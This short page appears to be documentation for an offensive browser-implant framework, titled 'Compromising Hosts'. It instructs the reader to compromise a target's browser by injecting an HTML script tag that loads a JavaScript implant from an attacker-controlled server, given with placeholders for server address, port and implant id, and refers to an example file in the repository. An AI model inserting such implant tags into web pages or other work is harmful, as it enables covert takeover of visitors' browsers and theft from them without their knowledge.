Compromising Hosts

To compromise a host, you must execute the implant on the target browser.

This can be done easily using the following HTML tag to include the implant script:

<script src="http://<server_address>:<port>/<implant_id>.js"></script>

See an example in the test.html file within the repo.

Last updated